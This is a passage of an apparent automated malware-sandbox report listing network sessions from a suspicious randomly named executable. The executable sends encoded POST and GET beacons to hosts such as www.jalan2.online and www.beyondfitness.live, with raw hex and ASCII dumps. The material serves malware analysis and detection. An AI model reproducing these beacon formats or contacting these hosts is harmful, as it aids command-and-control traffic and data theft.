                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          29192.168.2.450036108.181.189.7803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:07.625039101 CET624OUTPOST /ykgd/ HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.jalan2.online
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.jalan2.online/ykgd/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 6a 50 6d 75 51 49 77 68 61 48 2f 6c 63 73 4d 35 4f 50 35 44 56 62 65 44 2b 70 58 4e 43 63 46 45 6f 73 56 51 4e 5a 59 7a 59 43 6f 6c 7a 75 73 5a 33 33 6d 66 2b 74 64 4b 69 38 32 39 37 4b 4a 57 78 68 6a 6a 64 68 77 42 36 66 6e 50 58 74 6e 6d 39 31 73 49 72 74 34 41 50 6d 75 79 73 46 30 57 50 61 36 78 71 4c 78 35 73 32 62 30 64 32 74 39 35 4a 54 6b 4d 70 4c 41 39 76 54 64 6f 41 2f 6f 74 50 33 73 48 47 7a 6a 6f 30 50 72 52 53 31 58 56 6c 44 6b 32 2b 67 77 63 45 62 62 43 42 56 49 66 50 37 4f 77 42 76 6e 52 49 69 41 38 49 68 33 36 6f 41 6f 72 77 3d 3d
                                                                                                                          Data Ascii: Mr60=wqjgxK/3qMsOjPmuQIwhaH/lcsM5OP5DVbeD+pXNCcFEosVQNZYzYColzusZ33mf+tdKi8297KJWxhjjdhwB6fnPXtnm91sIrt4APmuysF0WPa6xqLx5s2b0d2t95JTkMpLA9vTdoA/otP3sHGzjo0PrRS1XVlDk2+gwcEbbCBVIfP7OwBvnRIiA8Ih36oAorw==
                                                                                                                          Nov 22, 2024 15:14:08.862458944 CET279INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          date: Fri, 22 Nov 2024 14:14:08 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          transfer-encoding: chunked
                                                                                                                          connection: close
                                                                                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                                                                          Data Ascii: a
                                                                                                                          Nov 22, 2024 15:14:08.863389969 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                                                                          Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          30192.168.2.450037108.181.189.7803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:10.286286116 CET644OUTPOST /ykgd/ HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.jalan2.online
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.jalan2.online/ykgd/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 73 50 32 75 57 70 77 68 64 6e 2f 6d 51 4d 4d 35 63 50 35 50 56 62 53 44 2b 6f 53 56 43 4f 52 45 6d 6f 52 51 4d 64 73 7a 62 43 6f 6c 37 4f 73 63 36 58 6d 45 2b 74 52 34 69 39 36 39 37 4b 4e 57 78 67 54 6a 64 53 6f 4f 34 50 6e 42 50 64 6e 6b 69 46 73 49 72 74 34 41 50 6d 37 36 73 42 59 57 50 70 69 78 71 75 64 36 68 57 62 33 4d 32 74 39 6f 35 53 74 4d 70 4c 79 39 72 61 4b 6f 44 58 6f 74 50 48 73 65 33 7a 67 6d 30 50 78 56 53 30 65 62 56 71 64 76 74 74 38 43 56 48 30 43 44 63 74 58 70 32 55 68 77 4f 77 44 49 47 7a 68 50 6f 44 33 72 39 68 77 31 37 37 52 55 33 58 4a 67 33 39 46 2f 6a 4b 53 69 52 4d 49 36 41 3d
                                                                                                                          Data Ascii: Mr60=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOREmoRQMdszbCol7Osc6XmE+tR4i9697KNWxgTjdSoO4PnBPdnkiFsIrt4APm76sBYWPpixqud6hWb3M2t9o5StMpLy9raKoDXotPHse3zgm0PxVS0ebVqdvtt8CVH0CDctXp2UhwOwDIGzhPoD3r9hw177RU3XJg39F/jKSiRMI6A=
                                                                                                                          Nov 22, 2024 15:14:11.689364910 CET279INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          date: Fri, 22 Nov 2024 14:14:11 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          transfer-encoding: chunked
                                                                                                                          connection: close
                                                                                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                                                                          Data Ascii: a
                                                                                                                          Nov 22, 2024 15:14:11.689763069 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                                                                          Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          31192.168.2.450038108.181.189.7803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:12.959923029 CET10726OUTPOST /ykgd/ HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.jalan2.online
                                                                                                                          Content-Length: 10301
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.jalan2.online/ykgd/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 73 50 32 75 57 70 77 68 64 6e 2f 6d 51 4d 4d 35 63 50 35 50 56 62 53 44 2b 6f 53 56 43 4f 70 45 6d 62 5a 51 4e 38 73 7a 55 69 6f 6c 6b 2b 73 64 36 58 6d 4a 2b 73 35 38 69 39 47 74 37 4a 6c 57 77 47 6e 6a 66 6e 45 4f 78 50 6e 42 54 74 6e 6c 39 31 74 51 72 74 6f 45 50 6d 72 36 73 42 59 57 50 6f 53 78 6a 62 78 36 6e 57 62 30 64 32 74 48 35 4a 54 49 4d 70 6a 69 39 72 66 33 70 79 33 6f 74 76 58 73 46 6c 62 67 71 30 50 33 53 53 30 47 62 56 32 38 76 74 42 61 43 56 6a 65 43 42 41 74 54 4d 4c 66 77 69 6d 4a 41 72 79 75 79 49 31 6b 33 62 30 69 2f 6d 6e 6c 41 57 6e 54 4d 6a 61 58 4a 76 72 41 4b 52 45 4c 56 39 41 77 41 41 2f 4e 2f 64 39 6d 66 52 79 61 74 2b 4e 43 46 34 33 63 58 36 6f 6e 33 34 5a 4d 2b 2f 66 4d 39 4c 64 34 69 50 51 4f 36 51 64 35 6e 5a 74 55 53 4b 57 72 6e 43 75 53 70 49 2f 62 51 42 64 4d 6c 5a 58 4c 4c 46 59 4f 4e 79 61 48 35 74 57 45 49 4b 50 54 63 63 4c 52 4a 55 5a 34 4e 53 5a 32 6b 37 63 69 35 58 52 33 78 66 54 6a 55 64 4b 57 78 46 4d 61 37 [TRUNCATED]
                                                                                                                          Data Ascii: Mr60=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOpEmbZQN8szUiolk+sd6XmJ+s58i9Gt7JlWwGnjfnEOxPnBTtnl91tQrtoEPmr6sBYWPoSxjbx6nWb0d2tH5JTIMpji9rf3py3otvXsFlbgq0P3SS0GbV28vtBaCVjeCBAtTMLfwimJAryuyI1k3b0i/mnlAWnTMjaXJvrAKRELV9AwAA/N/d9mfRyat+NCF43cX6on34ZM+/fM9Ld4iPQO6Qd5nZtUSKWrnCuSpI/bQBdMlZXLLFYONyaH5tWEIKPTccLRJUZ4NSZ2k7ci5XR3xfTjUdKWxFMa7VmjFksor4roCUb7ScI3TFH4nl1J0qnpAfZfOSsxg/JsEeAI6VBDBNMZqRXv7PiB7ReVVAwUzUaup275WGuU0Ytf4aLRBZhHECTXAFOEhk5aZMDqar7+NESR871Yp7TGTJ9/1FnKERZm0vpB131qX7fVR3ziCv88X+QoFOQbOykHdLFKoHrHGN+j60vmOc0Y6k1+mmCzqUetFYurBQ5eoPq9fDmNCTmT9+KJGdcjX7/FSxmYlbExa1o9pGFFvAN6ss/yjOZgeN0eym4MsG0T6dUbXhV+AMczV23SEXSS37bx8ax52hkGBnZ4hPcse4Vi8IPaDZJ8AbGSZzz7duBvStaEnlHT7xbOFOaIPD15sXfpOLCrQWtYpt/Gx2acEJ7MFjaO78quohGui+D014gLhAQC89KuMu96Q9tcDBZj66nHUVzjbwbVEk8QXOQKhq+eYgNcvPEpAKLvthTlb8chxJSCFbCSSbWZTCqD1Y8h7k0gJrxjJtKwL/59sZmgIvltBqd+8OIWlJGraa9PkBzUvd7PZuZAQmwqkxltaLym+UUYf4ZF7sgQz3H4cEW1DIMt2GcVpzUEWdbtFadCPiky2r98Nt07iq24Z1Vbd4zFeZgf0MeN2mpfhJJmzMrjWdmaxgg5ZYH3qEpMnXsPwFKhrco2qvEX6ZoAmdy [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:14:14.752383947 CET992INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          date: Fri, 22 Nov 2024 14:14:13 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          content-encoding: gzip
                                                                                                                          vary: Accept-Encoding
                                                                                                                          transfer-encoding: chunked
                                                                                                                          connection: close
                                                                                                                          Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                                                                                          Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          32192.168.2.450039108.181.189.7803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:15.626375914 CET356OUTGET /ykgd/?Mr60=9oLAy+SEg8JXgI2QYoJQeX3wYK8lZLg7WKSBzbS4ZtdOlYE/G55wBiI45c0M4XnEo9VWh9C7p4Et5DP8QDQ/2tLKee7xpwwT0pkaI3y+yn0sIY/GpO9ikGE=&o6=SpTPojpx7H HTTP/1.1
                                                                                                                          Host: www.jalan2.online
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-us
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Nov 22, 2024 15:14:17.012893915 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          content-type: text/html
                                                                                                                          cache-control: private, no-cache, max-age=0
                                                                                                                          pragma: no-cache
                                                                                                                          content-length: 1249
                                                                                                                          date: Fri, 22 Nov 2024 14:14:16 GMT
                                                                                                                          server: LiteSpeed
                                                                                                                          connection: close
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                                                                                          Nov 22, 2024 15:14:17.012943029 CET224INData Raw: 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c
                                                                                                                          Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          33192.168.2.450040209.74.77.107803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:22.778987885 CET639OUTPOST /fbpt/ HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.beyondfitness.live
                                                                                                                          Content-Length: 201
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.beyondfitness.live/fbpt/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 6a 75 6c 45 6c 62 78 6b 45 38 30 4d 62 64 76 4c 42 65 79 4b 30 6a 75 4e 38 72 30 54 76 36 75 6e 34 75 58 68 53 4f 53 69 39 6d 5a 5a 38 62 62 4f 61 6a 32 42 75 38 61 4d 4f 56 78 58 46 56 4b 58 58 55 34 4e 6e 2b 68 35 6b 73 68 76 6f 33 66 71 70 56 4c 43 6e 31 68 75 6f 55 50 34 58 79 4a 53 77 65 75 6e 4a 34 45 43 34 55 57 69 5a 75 35 56 70 78 4d 34 6a 6f 4c 66 6f 7a 46 4b 30 67 4f 38 6c 70 58 31 42 37 49 7a 70 4e 77 2f 66 64 6e 35 2f 48 32 67 59 31 54 36 65 58 45 31 59 77 36 61 36 75 46 30 55 78 31 31 6a 57 71 4d 6d 30 39 72 59 71 68 64 41 3d 3d
                                                                                                                          Data Ascii: Mr60=hF42VS9OEqvX3julElbxkE80MbdvLBeyK0juN8r0Tv6un4uXhSOSi9mZZ8bbOaj2Bu8aMOVxXFVKXXU4Nn+h5kshvo3fqpVLCn1huoUP4XyJSweunJ4EC4UWiZu5VpxM4joLfozFK0gO8lpX1B7IzpNw/fdn5/H2gY1T6eXE1Yw6a6uF0Ux11jWqMm09rYqhdA==
                                                                                                                          Nov 22, 2024 15:14:24.036556959 CET533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:23 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          34192.168.2.450041209.74.77.107803104C:\Program Files (x86)\SAmkgsoDaGLUlMXdgHYfokaVNFHsGLOzMJqoobAwaSTwORZJc\QfgdvbjddZ.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Nov 22, 2024 15:14:25.442375898 CET659OUTPOST /fbpt/ HTTP/1.1
                                                                                                                          Host: www.beyondfitness.live
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-us
                                                                                                                          Origin: http://www.beyondfitness.live
                                                                                                                          Content-Length: 221
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Referer: http://www.beyondfitness.live/fbpt/
                                                                                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                                                                          Data Raw: 4d 72 36 30 3d 68 46 34 32 56 53 39 4f 45 71 76 58 33 43 2b 6c 49 6a 54 78 73 45 38 7a 4a 62 64 76 43 68 65 32 4b 30 76 75 4e 2b 48 64 54 64 4f 75 6e 59 2b 58 67 54 4f 53 6c 39 6d 5a 57 63 62 61 4b 61 6a 44 42 75 77 53 4d 4c 39 78 58 45 78 4b 58 56 38 34 4f 51 4b 75 72 6b 73 6a 6a 49 33 52 31 35 56 4c 43 6e 31 68 75 6f 41 68 34 58 71 4a 53 42 75 75 6c 6f 34 48 4c 59 55 58 31 70 75 35 47 35 78 49 34 6a 70 75 66 72 33 76 4b 32 49 4f 38 6b 5a 58 77 41 37 58 36 70 4e 36 79 2f 63 33 39 75 79 75 69 71 38 4a 79 38 54 66 72 37 73 6d 53 63 6a 66 6c 6c 51 69 6e 6a 79 5a 52 68 39 4a 6d 62 58 6f 47 47 68 75 73 32 2f 48 66 41 69 5a 51 37 43 46 54 53 35 4e 64 43 38 3d
                                                                                                                          Data Ascii: Mr60=hF42VS9OEqvX3C+lIjTxsE8zJbdvChe2K0vuN+HdTdOunY+XgTOSl9mZWcbaKajDBuwSML9xXExKXV84OQKurksjjI3R15VLCn1huoAh4XqJSBuulo4HLYUX1pu5G5xI4jpufr3vK2IO8kZXwA7X6pN6y/c39uyuiq8Jy8Tfr7smScjfllQinjyZRh9JmbXoGGhus2/HfAiZQ7CFTS5NdC8=
                                                                                                                          Nov 22, 2024 15:14:26.649337053 CET533INHTTP/1.1 404 Not Found
                                                                                                                          Date: Fri, 22 Nov 2024 14:14:26 GMT
                                                                                                                          Server: Apache
                                                                                                                          Content-Length: 389
                                                                                                                          Connection: close
                                                                                                                          Content-Type: text/html
                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
